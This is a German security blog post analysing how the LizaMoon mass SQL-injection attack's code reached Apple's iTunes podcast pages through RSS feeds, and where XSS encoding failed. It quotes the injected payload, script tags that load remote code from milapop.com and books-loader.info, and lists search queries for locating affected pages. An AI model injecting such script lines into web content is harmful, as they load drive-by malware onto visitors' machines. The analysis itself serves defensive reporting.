LizaMoon auf Apples iTunes-Seiten
"LizaMoon" wurde auch auf Apples iTunes-Seiten gefunden. Nun verwendet Apple kaum ASP.NET für seine Websites, und der SQL-Injection-Massenangriff richtet sich nur gegen ASP.NET-Anwendungen mit Microsofts SQL Server. Wie kommt der Schadcode also auf Apples Seiten?
itunes.apple.com - Von Hinten durch die Brust ins Auge
Unter den ersten Opfern von LizaMoon waren
laut Websense
auch einige itunes.apple.com
-URLs. Websense vermutet, dass
der Schadcode über die RSS/XML-Feeds, über die Podcast-Produzenten neue
Folgen ankündigen, auf den Server gelangte. Die RSS/XML-Feed wären dann
von bereits kompromittierten Servern an den iTunes-Server gesendet worden.
Dort endete der von Websense beobachtete Angriff dann jedoch, da die
iTunes-Website die Script-Tags durch umkodieren der <
- und
>
-Zeichen in ihre HTML-Entities <
und
>
unbrauchbar macht. Mit anderen Worten: Der Schutz
vor XSS-Angriffen hat funktioniert. Jedenfalls in diesen Fällen.
Der Schutz, der versagte?
Leider scheint der XSS-Filter aber nicht immer zu funktionieren. Im GFI
LABS Blog wurden ebenfalls infizierte iTunes-Seiten
gemeldet,
und auch wenn es auf dem ersten Blick so aussieht, was wäre es falscher
Alarm und der eingeschleuste Code wäre auch dort unbrauchbar gemacht worden
(zumindest in den gezeigten Screenshots sind die <
- und
>
-Zeichen als HTML-Entities kodiert), trügt der Schein.
Wie ich mich mit eigenen Augen überzeugen konnte, enthalten alle drei
genannten Seiten,
itunes.apple.com/us/podcast/turkish/id161320202
,
itunes.apple.com/pl/podcast/cuneyt/id152442304
und
itunes.apple.com/kr/podcast/belgesel-title-script-src/id206817953
,
den Schadcode auch in zumindest theoretisch funktionsfähiger Form:
Zum Glück steht das
</title><script src=http://milapop.com/ur.php></script>
auf den ersten beiden Seiten an Stellen im Sourcecode, an denen es keinen
Schaden anrichten kann (in einem div
-Tag), und der Server mit
dem Schadcode ist auch nicht zu erreichen. Aber das ist beides wirklich nur
Glück. Ich glaube nicht, dass Apple XSS-Code nur da durch Umkodieren
unbrauchbar machen möchte, wo er evtl. Schaden anrichten kann.
Auf der dritten genannten Seite gibt es sehr viel mehr "scharfe"
Fundstellen des Schadcodes
</title><script src=http://books-loader.info/ur.php></script>
,
aber auch hier befinden sie sich alle an der "falschen" Stelle (zwei Mal in
Meta
-Tags, mehrmals in tr
-Tags und in einem
div
-Tag), außerdem ist auch
hier der Server für den Schadcode nicht mehr erreichbar.
Wie es auf den Websites der jeweiligen Podcast-Produzenten aussieht, habe ich mir nicht mehr genauer angesehen. Irgendwo muss der Schadcode ja in die RSS/XML-Feeds gelangt sein...
Diese drei sind nur die Spitze des Eisbergs
Die drei von GFI gefundenen URL sind nur die Spitze eines (allerdings
relativ kleinen) Eisbergs: Die Google-Suche nach
src=http://milapop.com/ur.php site:apple.com
lieferte 27 Fundstellen, die nach
src=http://books-loader.info/ur.php site:apple.com
8. Aber es gibt ja noch etliche Domains, die im Rahmen der LizaMoon-Angriffe zum Einsatz
kamen.
src=http://lizamoon.com/ur.php site:apple.com
zum Beispiel liefert weitere 37 Fundstellen (alle Ergebnisse vom 7. April
2011, 11:30 Uhr).
Das ist wohl ein klarer Fall von "Cupertino, you have a problem". Eigentlich sollte man denen wohl Bescheid sagen. Nach negativen Erfahrungen in der Vergangenheit spare ich mir die Mühe aber.
Übersicht über alle Artikel zum Thema
- Drive-by-Infektionen - Gefahren drohen überall
- Drive-by-Infektionen durch SQL-Injection vorbereitet
- Drive-by-Infektionen: So kommt der Schadcode auf den Server
- Drive-by-Infektionen - Vom Server auf den Client
- Drive-by-Infektionen - Ein Blick auf die Exploits
- Drive-by-Infektionen erkennen und abwehren
- LizaMoon - Massenhack mit minimalen Folgen
- Aktuelles: LizaMoon auf Apples iTunes-Seiten
- Drive-by-Infektionen über präparierte Werbung
Trackbacks
Dipl.-Inform. Carsten Eilers am : Clickjacking gegen Flash, urchin.js und Duqu - nichts als Wiederholungen!
Vorschau anzeigen
Dipl.-Inform. Carsten Eilers am : SQL-Injection im Schnelldurchlauf
Vorschau anzeigen